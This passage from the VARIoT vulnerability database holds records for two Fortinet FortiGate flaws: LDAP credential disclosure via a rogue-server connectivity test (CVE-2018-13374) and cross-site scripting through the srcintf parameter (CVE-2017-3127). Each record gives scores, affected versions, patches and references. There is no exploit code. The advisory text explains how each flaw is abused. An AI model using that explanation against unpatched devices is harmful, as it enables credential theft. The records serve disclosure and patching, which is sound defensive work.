Search criteria
30 vulnerabilities found for FortiGate by Fortinet
VAR-201901-0568
Vulnerability from variot - Updated: 2025-11-18 15:15A Improper Access Control in Fortinet FortiOS 6.0.2, 5.6.7 and before, FortiADC 6.1.0, 6.0.0 to 6.0.1, 5.4.0 to 5.4.4 allows attacker to obtain the LDAP server login credentials configured in FortiGate via pointing a LDAP server connectivity test request to a rogue LDAP server instead of the configured one. Fortinet FortiOS Contains a vulnerability in improper permission assignment for critical resources.Information may be obtained. Fortinet FortiOS is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. FortiOS 6.0.0 through 6.0.2, and 5.6.7 and prior are vulnerable. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Fortinet FortiOS versions 6.0.0 to 6.0.2 earlier and 5.6.7 and earlier versions have an access control error vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201901-0568",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortiadc",
"scope": "lt",
"trust": 1.0,
"vendor": "fortinet",
"version": "6.0.2"
},
{
"model": "fortiadc",
"scope": "gte",
"trust": 1.0,
"vendor": "fortinet",
"version": "5.4.0"
},
{
"model": "fortiadc",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": "6.1.0"
},
{
"model": "fortios",
"scope": "lt",
"trust": 1.0,
"vendor": "fortinet",
"version": "6.0.3"
},
{
"model": "fortiadc",
"scope": "gte",
"trust": 1.0,
"vendor": "fortinet",
"version": "6.0.0"
},
{
"model": "fortiadc",
"scope": "lt",
"trust": 1.0,
"vendor": "fortinet",
"version": "5.4.5"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30d5\u30a9\u30fc\u30c6\u30a3\u30cd\u30c3\u30c8",
"version": null
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "6.0.2"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "6.0.1"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "6.0"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6.7"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6.6"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6.5"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6.4"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6.3"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6.2"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6.1"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "0"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "6.0.3"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.6.8"
}
],
"sources": [
{
"db": "BID",
"id": "106686"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013156"
},
{
"db": "NVD",
"id": "CVE-2018-13374"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Julio Engels Urena Martinez",
"sources": [
{
"db": "BID",
"id": "106686"
}
],
"trust": 0.3
},
"cve": "CVE-2018-13374",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2018-13374",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-123427",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-13374",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 4.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2018-013156",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-13374",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "psirt@fortinet.com",
"id": "CVE-2018-13374",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-13374",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201901-776",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-123427",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-13374",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123427"
},
{
"db": "VULMON",
"id": "CVE-2018-13374"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-776"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013156"
},
{
"db": "NVD",
"id": "CVE-2018-13374"
},
{
"db": "NVD",
"id": "CVE-2018-13374"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Improper Access Control in Fortinet FortiOS 6.0.2, 5.6.7 and before, FortiADC 6.1.0, 6.0.0 to 6.0.1, 5.4.0 to 5.4.4 allows attacker to obtain the LDAP server login credentials configured in FortiGate via pointing a LDAP server connectivity test request to a rogue LDAP server instead of the configured one. Fortinet FortiOS Contains a vulnerability in improper permission assignment for critical resources.Information may be obtained. Fortinet FortiOS is prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may aid in further attacks. \nFortiOS 6.0.0 through 6.0.2, and 5.6.7 and prior are vulnerable. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Fortinet FortiOS versions 6.0.0 to 6.0.2 earlier and 5.6.7 and earlier versions have an access control error vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13374"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013156"
},
{
"db": "BID",
"id": "106686"
},
{
"db": "VULHUB",
"id": "VHN-123427"
},
{
"db": "VULMON",
"id": "CVE-2018-13374"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-13374",
"trust": 3.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013156",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201901-776",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "46171",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1901",
"trust": 0.6
},
{
"db": "BID",
"id": "106686",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "151205",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-97775",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-123427",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-13374",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123427"
},
{
"db": "VULMON",
"id": "CVE-2018-13374"
},
{
"db": "BID",
"id": "106686"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-776"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013156"
},
{
"db": "NVD",
"id": "CVE-2018-13374"
}
]
},
"id": "VAR-201901-0568",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-123427"
}
],
"trust": 0.01
},
"last_update_date": "2025-11-18T15:15:00.267000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FG-IR-18-157",
"trust": 0.8,
"url": "https://fortiguard.com/psirt/FG-IR-18-157"
},
{
"title": "Fortinet FortiOS Fixes for access control error vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=88870"
},
{
"title": "Conti-Ransomware",
"trust": 0.1,
"url": "https://github.com/Ransomware-Advisory/Conti-Ransomware "
},
{
"title": "plaintext",
"trust": 0.1,
"url": "https://github.com/juliourena/plaintext "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-13374"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-776"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013156"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-732",
"trust": 1.1
},
{
"problemtype": "Improper permission assignment for critical resources (CWE-732) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-284",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123427"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013156"
},
{
"db": "NVD",
"id": "CVE-2018-13374"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://fortiguard.com/advisory/fg-ir-18-157"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2018-13374"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-13374"
},
{
"trust": 0.8,
"url": "https://cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/46171/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1901"
},
{
"trust": 0.3,
"url": "http://www.fortinet.com/"
},
{
"trust": 0.3,
"url": "https://fortiguard.com/psirt/fg-ir-18-157"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/732.html"
},
{
"trust": 0.1,
"url": "https://github.com/ransomware-advisory/conti-ransomware"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123427"
},
{
"db": "VULMON",
"id": "CVE-2018-13374"
},
{
"db": "BID",
"id": "106686"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-776"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013156"
},
{
"db": "NVD",
"id": "CVE-2018-13374"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-123427"
},
{
"db": "VULMON",
"id": "CVE-2018-13374"
},
{
"db": "BID",
"id": "106686"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-776"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-013156"
},
{
"db": "NVD",
"id": "CVE-2018-13374"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-01-22T00:00:00",
"db": "VULHUB",
"id": "VHN-123427"
},
{
"date": "2019-01-22T00:00:00",
"db": "VULMON",
"id": "CVE-2018-13374"
},
{
"date": "2018-11-07T00:00:00",
"db": "BID",
"id": "106686"
},
{
"date": "2019-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201901-776"
},
{
"date": "2019-02-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-013156"
},
{
"date": "2019-01-22T14:29:00.220000",
"db": "NVD",
"id": "CVE-2018-13374"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-123427"
},
{
"date": "2021-06-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-13374"
},
{
"date": "2018-11-07T00:00:00",
"db": "BID",
"id": "106686"
},
{
"date": "2021-06-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201901-776"
},
{
"date": "2024-05-31T06:58:00",
"db": "JVNDB",
"id": "JVNDB-2018-013156"
},
{
"date": "2025-10-24T12:53:15.020000",
"db": "NVD",
"id": "CVE-2018-13374"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201901-776"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortinet\u00a0FortiOS\u00a0 Vulnerability in improper permission assignment for critical resources in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-013156"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201901-776"
}
],
"trust": 0.6
}
}
VAR-201706-0294
Vulnerability from variot - Updated: 2025-04-20 23:25A Cross-Site Scripting vulnerability in Fortinet FortiGate 5.2.0 through 5.2.10 allows attacker to execute unauthorized code or commands via the srcintf parameter during Firewall Policy Creation. Fortinet FortiOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fortinet FortiOS 5.2.0 through 5.2.10 are vulnerable. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201706-0294",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.2.6"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.2.5"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.2.4"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.2.3"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.2.2"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.2.1"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.2.10"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.9,
"vendor": "fortinet",
"version": "5.2.0"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": "5.2.7"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": "5.2.8"
},
{
"model": "fortios",
"scope": "eq",
"trust": 1.3,
"vendor": "fortinet",
"version": "5.2.9"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.8,
"vendor": "fortinet",
"version": "5.2.0 to 5.2.10"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.2.11"
}
],
"sources": [
{
"db": "BID",
"id": "98048"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1510"
},
{
"db": "NVD",
"id": "CVE-2017-3127"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:fortinet:fortigate",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Amir Morshedizadeh",
"sources": [
{
"db": "BID",
"id": "98048"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1510"
}
],
"trust": 0.9
},
"cve": "CVE-2017-3127",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2017-3127",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-111330",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2017-3127",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-3127",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2017-3127",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-1510",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-111330",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-111330"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1510"
},
{
"db": "NVD",
"id": "CVE-2017-3127"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Cross-Site Scripting vulnerability in Fortinet FortiGate 5.2.0 through 5.2.10 allows attacker to execute unauthorized code or commands via the srcintf parameter during Firewall Policy Creation. Fortinet FortiOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. \nFortinet FortiOS 5.2.0 through 5.2.10 are vulnerable. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-3127"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
"db": "BID",
"id": "98048"
},
{
"db": "VULHUB",
"id": "VHN-111330"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-3127",
"trust": 2.8
},
{
"db": "BID",
"id": "98048",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1038367",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004384",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1510",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-111330",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-111330"
},
{
"db": "BID",
"id": "98048"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1510"
},
{
"db": "NVD",
"id": "CVE-2017-3127"
}
]
},
"id": "VAR-201706-0294",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-111330"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-20T23:25:01.498000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FG-IR-17-017",
"trust": 0.8,
"url": "https://fortiguard.com/psirt/FG-IR-17-017"
},
{
"title": "Fortinet FortiOS Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=69703"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1510"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-111330"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
